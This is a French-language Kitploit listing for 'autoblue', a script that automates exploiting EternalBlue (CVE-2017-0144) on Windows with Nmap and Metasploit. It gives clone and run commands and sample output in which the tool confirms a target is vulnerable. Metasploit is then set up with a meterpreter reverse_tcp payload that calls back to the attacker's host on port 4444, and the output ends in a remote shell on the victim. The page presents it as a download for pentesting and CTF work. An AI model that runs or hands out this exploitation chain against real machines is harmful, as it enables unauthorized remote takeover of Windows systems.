Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
autoblue — AutoBlue - Outil d'exploitation automatisé d'EternalBlue (CVE-2017-0144 / MS17-010) utilisant Nmap et Metasploit pour le hacking éthique, les tests d'intrusion et les défis CTF. Strictement réservé à un usage autorisé et éducatif uniquement ! | Kitploit
Outils/GitHubGitHub/atithkhawas/autoblue
Scanners de VulnérabilitésGénération de PayloadsExploitationPost-ExploitationCTFTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubatithkhawas/autoblue

autoblue

AutoBlue - Outil d'exploitation automatisé d'EternalBlue (CVE-2017-0144 / MS17-010) utilisant Nmap et Metasploit pour le hacking éthique, les tests d'intrusion et les défis CTF. Strictement réservé à un usage autorisé et éducatif uniquement !

4110il y a 1 anPas encore vérifié
Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

AUTOBLUE : Outil automatisé d'exploitation EternalBlue

AUTOBLUE est un outil d'automatisation conçu pour exploiter la vulnérabilité EternalBlue (CVE-2017-0144) sur les machines Windows. L'outil intègre la puissance de Nmap pour le scan de vulnérabilités et de msfconsole de Metasploit pour l'exploitation, permettant aux utilisateurs d'identifier automatiquement les systèmes vulnérables et de lancer l'exploit EternalBlue pour obtenir un accès distant à la cible.

Cet outil est principalement conçu pour les professionnels de la sécurité, les testeurs d'intrusion et les hackers éthiques travaillant dans des environnements contrôlés et autorisés, tels que les challenges Capture The Flag (CTF), les engagements de test d'intrusion ou les configurations de laboratoire. AUTOBLUE permet aux utilisateurs d'exploiter la vulnérabilité EternalBlue avec une intervention manuelle minimale, simplement en saisissant l'adresse IP cible.

Fonctionnalités

  • Scan automatisé des vulnérabilités : Utilise Nmap pour rechercher la vulnérabilité EternalBlue (CVE-2017-0144) sur la machine cible.

  • Exploitation transparente : Utilise msfconsole de Metasploit pour lancer automatiquement l'exploit EternalBlue.

  • Configuration simple : Nécessite uniquement une adresse IP cible et un environnement de travail avec Nmap et Metasploit installés.

  • Rapport de sortie : Génère une sortie indiquant le succès ou l'échec de la tentative d'exploitation.

Table des matières

  • Prérequis

  • Installation

  • Utilisation

  • Fonctionnement

  • Considérations de sécurité

  • Contribution

  • Licence

  • Remerciements

  • Avertissement

Prérequis :

Avant d'utiliser AUTOBLUE, assurez-vous que les outils suivants sont installés sur votre machine :

Nmap : Un outil de scan réseau pour détecter les machines vulnérables.

Metasploit Framework : Une plateforme de test d'intrusion qui inclut des exploits pour EternalBlue.

Installer Nmap :

  • Sous Linux (basé sur Debian) :

Copier le code

      sudo apt update

et

      sudo apt install nmap

Sous Windows ou macOS, téléchargez Nmap depuis le site officiel.

Installer Metasploit :

Sous Linux (basé sur Debian) :

Copier le code

      sudo apt update

et

     sudo apt install metasploit-framework
     

Sous Windows ou macOS, téléchargez Metasploit depuis le site officiel.

Installation :

Pour installer AUTOBLUE, suivez ces étapes :

  • Clonez le dépôt :

      git clone https://github.com/AtithKhawas/autoblue.git
    

    et

         cd autoblue
    

Assurez-vous que Nmap et Metasploit sont correctement installés comme prérequis.

  • Rendez le script exécutable :

    chmod +x autoblue.sh
    

Utilisation :

AUTOBLUE est conçu pour automatiser le scan et l'exploitation de la vulnérabilité EternalBlue. Voici comment l'utiliser :

  • Lancez l'outil

Pour utiliser AUTOBLUE, exécutez la commande suivante dans votre terminal :

Copier le code

     ./autoblue.sh 

Sortie :

     ┌──(root㉿kali)-[/home/Elliot] 
     └─# ./autoblue.sh 
     ============================================
     ********************************************
     AutoBlue    - EternalBlue Exploit Automation
     ********************************************
     ********************************************
     ------------------------Made by ATITH KHAWAS
     ============================================
     Enter Target IP Address:

Il vous demandera l'adresse IP cible et la vôtre.

Exemple

      Enter Target IP Address: Target<IP Address>
      Enter Your IP Address: Your <IP Address>

Une fois l'outil lancé, il commencera le scan avec Nmap :

Sortie-1

 Target IP Address: ***.***.**.**
 [+] Scanning Target for MS17-010 Vulnerability...
 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
 Nmap scan report for ***.***.**.**
 Host is up (0.19s latency).

 PORT    STATE SERVICE
 445/tcp open  microsoft-ds

 Host script results:
 | smb-vuln-ms17-010: 
 |   VULNERABLE:
 |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
 |     State: VULNERABLE
 |     IDs:  CVE:CVE-2017-0143
 |     Risk factor: HIGH
 |       A critical remote code execution vulnerability exists in Microsoft SMBv1
 |        servers (ms17-010).
 |           
 |     Disclosure date: 2017-03-14
 |     References:
 |       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
 |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
 |_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

 Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
 [+] Target is VULNERABLE to EternalBlue!

C'est là que le vrai travail commence, réduisant considérablement le processus chronophage. Si la cible est vulnérable, il lance automatiquement Msfconsole et définit RHOSTS, PAYLOAD, LHOST et LPORT avec le port par défaut 4444.

Sortie-2

      [+] Launching Metasploit...
      [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
      RHOSTS => ***.***.**.**
      PAYLOAD => windows/x64/meterpreter/reverse_tcp
      LHOST => ***.***.**.**
      LPORT => 4444
      [*] Started reverse TCP handler on ***.***.**.**:4444 

Et nous donne le Shell Meterpreter de la cible.

Sortie-3

       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

       meterpreter > pwd
       C:\Windows\system32

Fonctionnement :

  • Scan via script Nmap : L'outil utilise d'abord Nmap Script Scan (--script smb-vuln-ms17-010) pour détecter si la machine cible est vulnérable à l'exploit EternalBlue. Il vérifie si le port 445 est ouvert et tente d'identifier les vulnérabilités SMB.

  • Exploit Metasploit : Si la machine cible est trouvée vulnérable, AUTOBLUE procède au lancement de l'exploit EternalBlue en utilisant msfconsole de Metasploit. Le script configure et envoie la charge utile nécessaire pour exploiter la vulnérabilité.

  • Shell inverse : Si l'exploitation réussit, un shell inverse est ouvert pour fournir une interface en ligne de commande sur la machine victime.

  • Retour d'information : L'outil fournit un retour d'information tout au long du processus, y compris si la cible a été exploitée avec succès, et affiche toute information pertinente (par exemple, l'adresse IP du shell inverse).

Considérations de sécurité :

  • Utilisation légale : Cet outil ne doit être utilisé que dans des environnements autorisés. Assurez-vous d'avoir une autorisation explicite pour tester la machine cible et que cela n'est pas illégal dans votre juridiction.

  • Saisie utilisateur : Assurez-vous que seules des IP de confiance sont fournies à l'outil pour éviter toute utilisation abusive. L'exécution de cet outil sur des systèmes non fiables pourrait entraîner des incidents de sécurité.

  • Sécurité de la charge utile : La charge utile du shell inverse utilisée dans cet outil est intrinsèquement risquée. N'exposez pas la machine d'attaque ou ses écouteurs à des réseaux non fiables.

  • Mettez à jour les dépendances : Assurez-vous de mettre régulièrement à jour Nmap et Metasploit pour atténuer les vulnérabilités de sécurité connues dans ces outils.

Contribution :

Télécharger l’outil